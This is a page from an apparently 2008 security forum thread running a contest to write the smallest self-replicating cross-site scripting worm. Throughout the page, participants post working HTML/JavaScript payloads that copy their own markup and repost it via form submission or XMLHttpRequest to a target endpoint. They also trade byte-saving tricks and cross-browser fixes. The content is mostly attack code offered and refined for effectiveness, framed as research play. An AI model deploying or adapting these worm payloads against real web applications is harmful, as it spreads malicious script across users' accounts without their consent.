Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 07, 2008 12:09AM

Damn I'm blind, when optimizing the long form (image & XMLHttpRequest) with with() I saw I was using "new XMLHttpRequest" without (), and it had worked all along, but I hadn't used it on the other versions ...
Anyway, the shorter XMLHttpRequest vectors:
<img src=. alt="alert('XSS');with(new XMLHttpRequest){open('post','post.php');setRequestHeader('Content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<img src=. alt=\x22'+alt+'\x22 onerror=eval(alt)>'))}" onerror=eval(alt)>
256 bytes - XMLHttpRequest, image
<script>eval(y="alert('XSS');q=unescape('%22');with(new XMLHttpRequest){open('POST','post.php');setRequestHeader('content-Type','application/x-www-form-urlencoded');send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))}")</script>
253 bytes - XMLHttpRequest, script


Another crazy note: after for the first time testing on Opera 9.5 beta (actually my 'main' browser for the moment), I noticed that the image code didn't worked (Opera actually needs some source to fire the onerror) I added a dot and saw that the quotes could be removed (still an innerHTML leftover), saving another 4 bytes! (from 260 to 256 bytes, coming close to the script code :-)
So after Opera testing I fired up Safari (3.0.4 beta for Windows), guess what, even that one passed both vectors like a charm, making it pass on all latest versions of the A-Grade browsers! :-D (BTW I guess FF1.5 and IE6 will work too)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 07, 2008 12:43AM

<form id=_><input name='content'><script>with(_)alert('XSS',submit(_[0].value='<form id=_>'+innerHTML.slice(action=(method='post')+'.php',142)))</script>

sorry, if somebody else has submitted this, it all looks that same atm.

153 bytes


EDIT:
Please disregard my submission. Its the same as Shawn's example only it is constructed differently (Shawn's is shown below).

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/07/2008 05:23AM by digi7al64.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 01:43AM

@sirdarckcat

Yes, I tried parentNode also, but for me it didn't work in FF so I dropped it. I wonder if there are more ways of cloning nodes quickly and without making the code bigger. One limitation is still duplicating the <form> instance.


@Kyran

I think you can shorten it with one byte by dropping the last semicolon, which isn't mandatory but advised in ECMAscript:
<script>
alert('xss');with(new XMLHttpRequest){open("POST","post.php");setRequestHeader('content-type','multipart/form-data');send('content=<script>'+innerHTML+'<\/script>')};
</script>


New one:

157 doctype insensitive:

<form id=_><input name='content'><script>x=document._;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

extra:

I also thought about making a ternary decision on the docytype:
<form id=_><input name='content'><script>(_)?x=_:x=document.i;x[0].value='<form id=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

which makes it more robust, but yes larger.


.



Edited 5 time(s). Last edit at 01/07/2008 03:31AM by Ronald.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 02:50AM

@Ronald: That way it'll work

<form name=_><input name="content"><script>x=document._;x[0].value='<form name=_>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>
161 bytes

But anyway - very nice one!

Greetings,
.mario



Edited 4 time(s). Last edit at 01/07/2008 03:01AM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 03:25AM

how bout:

<form name="i" id=j>
<input name='content'><script>(j)?x=j:x=document.i;x[0].value='<form name="i" id=j>'+x.innerHTML;alert('XSS');x.action=(x.method='post')+'.php';x.submit()</script>

It seems cross doctype on my tests!

edit: deleted previous, silly mistake without testing stuff.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 05:03AM

<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

if the above works on IE count it as my official entry :)
The slice is adjusted depending on the content

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/07/2008 05:39AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 05:04AM

@Ronald

Ternary operators don't need (), you can save 2 chars ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 06:10AM

Yeah the form names also don't need quotes, so that's an extra 4 bytes right there, so new_vector=(old-6) :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 07, 2008 07:14AM

another advantage of a worm using XMLHTTP is that it can be made with pure javascript.

i would say there are often more opportunities for injecting just javascript (script tags, event handlers, etc) than there is a possibility to inject arbitrary html codes + script.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 08:41AM

Similar technique as my previous one but this time using body, also the payload is the entire page and since it resubmits the entire page again the worm should be identical.

<body onload="with(document)body.innerHTML='<form action=post.php method=post><textarea name=content>'+body.parentNode.innerHTML,forms[0].submit()"

OR

<script>with(document.body)innerHTML='<form action=post.php method=post><textarea name=content>'+parentNode.innerHTML;document.forms[0].submit()</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 01/07/2008 08:50AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 07, 2008 09:19AM

@Gareth - I think this breaks several of the rules.

3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x). We will assume content will get rejected by post.php if it grows beyond n bytes.
6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:21AM

Yeh, like one of my first worms. :) But it wasn't allowed because RSnake said it must be very small what it submits/replicates, think -> VARCHAR(255)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 09:25AM

@Rsnake

The content is replaced so it should work on any site and the payload does not change so I'm thinking it should be valid. Plus the technique works on IE + Firefox.
IMO it's a bit harsh if it isn't accepted but hey you're the judge.

Does this one break the rules?:-
<script>with(d=document)(b=body).innerHTML='<form><textarea name=content>'+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.php')</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:34AM

Obviously ;) my test script says:

Length: 72
nerHTML.slice(126,-20);with(d.forms[0])submit(action=(method='post')+'.p</plaintext>

Though the solution is nice the problem is that the slice parameters depend on the victim's site markup. Plus it doesn't alert ;)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 09:40AM

<b><form action=post.php method=post><input name=content><img src=1 onerror=alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}></form></b>

171 BYTES

Anyway, it's been a long time since I made my last post on this board, but this contest really is a lot of fun. I've used the <img src= because it gives me easy DOM access. I got a solution with more obfuscated code, which is a bit bigger but uses some quite exotic HTML features :o)

Not tested in MSIE because I dont have this Browser, I'd appreciate if someone could try this. Firefox works, and therefore we're done with this ;)

cheers, beni

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 09:48AM

Nope - it's 179 Bytes. Firefox transforms the code like below - manage to reduce it by 23 characters and you're in the game *g*

<b><form action="post.php" method="post"><input name="content"><img src="1" onerror="alert('xss');with(parentNode){content.value=parentNode.innerHTML.bold();submit()}"></form></b>

Also you can get rid of several bytes if you use better nesting of the methods to avoid usage of ;.



Edited 1 time(s). Last edit at 01/07/2008 09:55AM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 10:17AM

Ok this should be valid and my final entry I've spent way too much time already:-

<body onload="alert('XSS');with(d=document)body.innerHTML='<form><textarea name=content>'+body.parentNode.innerHTML.match(/.{21}XSS.{176}/);with(d.forms[0])submit(action=method='post'+'.php')"

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/07/2008 10:20AM by Gareth Heyes.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 07, 2008 10:37AM

The source code of some worms may be different after they have been run depending on if the replication occured in IE or Firefox. They may still work in the user agent used for the first generation of replication, but what if the other user agent is used?

For example: suppose site X has a XSS vulnerability.
IE user visits my infected profile on the site. IE user's profile is then infected with the source code after IE replication.
If a Firefox user visits that IE user's profile, does the IE-replicated source code have to replicate in their Firefox browser? Or does it only have to replicate for other IE users? Or, what if it still works, but the length increases, after IE replication-->Firefox replication?

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 10:44AM

Hmmm - doesn't replicate correctly - content=null :-/

Although it's interesting - i didn't know that an onload handler in a second body tag fires if the first ships without it:

<html>
<body onload="alert(1)">
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>
alerts 1

<html>
<body>
<div></div>
<body onload="alert(2)"></body>
<div></div>
</body>
</html>
alerts 2



Greetings,
.mario



Edited 2 time(s). Last edit at 01/07/2008 10:45AM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: dbloom
Date: January 07, 2008 10:45AM

You can use <body onfocus> which also fires automatically, but is much less likely to be already defined. That's what I used for my worm.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 10:47AM

@dbloom: not in FF2

sorry - had a mistyping. it works!



Edited 1 time(s). Last edit at 01/07/2008 10:50AM by .mario.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 07, 2008 11:17AM

@Gareth Heyes - .mario is correct, yours won't work if there is already an event handler assigned to body. Also you are using forms[0] where I said you aren't supposed to have knowledge of the DOM. The reason for this is that there may be other forms on the page above it. It shouldn't break.

@dbloom - I'd be more likely to take onfocus, because, as you said, it's far less often used (actually I've never even seen it in the wild). But to answer your other question it should work perfectly after replicated in both browsers. Otherwise it's far less dangerous and only dangerous to the people who view the original strain with that worm code in it. It's effectively like not making it cross platform at all, since very few people are likely to visit the original page. The only way I could see your method working is if you were to somehow get them to go back to the original page and run the original code if they run across the second variant. So for the purposes of this contest, let's just say it's got to replicate the same in both browsers.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 11:34AM

@rsnake

Yeah it isn't valid but it doesn't matter about document.forms because the vector removes all the content off the page anyway so there would be always one form.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:38AM

Not aiming for a prize, just iframe fun:

<iframe src=. onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.setRequestHeader('content-type','multipart/form-data');r.send('content='+body.innerHTML)">

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:42AM

*COUGH*

this *works* in Firefox...

<iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+body.innerHTML)">

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: beNi
Date: January 07, 2008 11:48AM

Ronald this isn't just sending the worm code buddy.. try
<b><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content='+parentNode.innerHTML.bold())"></b>

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 11:55AM

mmm kay, better 1:

<form><iframe onload="alert('xss');r=new XMLHttpRequest;r.open('POST','post.php');r.send('content=<form>'+document.forms[0].innerHTML)">

it may or may not need a closing form tag, but anyhow it works like this.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 07, 2008 11:58AM

This works finally I think:-

<script x="">alert('XSS');with(document)c=body.parentNode.innerHTML.match(/<script x([\n]|.){197}/)[0],body.innerHTML='<form action=post.php method=post><textarea name=content>'+c,forms[0].submit()</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 07, 2008 12:01PM

Okay, wtf.

<form id=a><input id=x name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))">

(146)

translates to this in FireFox

<form id=a><input id="x" name="content"><iframe onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></iframe>

(157)

Okay, it's just closing the iframe, that's logic. But check out what IE(tab) does with this:

<form id=a></HEAD><BODY><INPUT id=x name=content><IFRAME onload="a.action=(a.method='post')+'.php',x.value='<form id=a>'+a.innerHTML;a.submit(alert('xss'))"></IFRAME></BODY>

(173!!)

What the hell? </head>? And why is it opening <body>? Is this because of my iframe? Does this happen also in IE7?

Anyway, this is my official submission until I made something smaller.

EDIT: Yes, it has doctype issues, I am aware of that ;)



Edited 1 time(s). Last edit at 01/07/2008 12:05PM by Spyware.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 07, 2008 12:04PM

OK BeNi let's kick it! :) one byte smaller: (129)

<b><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.bold())"></b>

I'm amazed how small we can get each time...



Edited 1 time(s). Last edit at 01/07/2008 12:11PM by Ronald.

Options: ReplyQuote
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 20


Sorry, only registered users may post in this forum.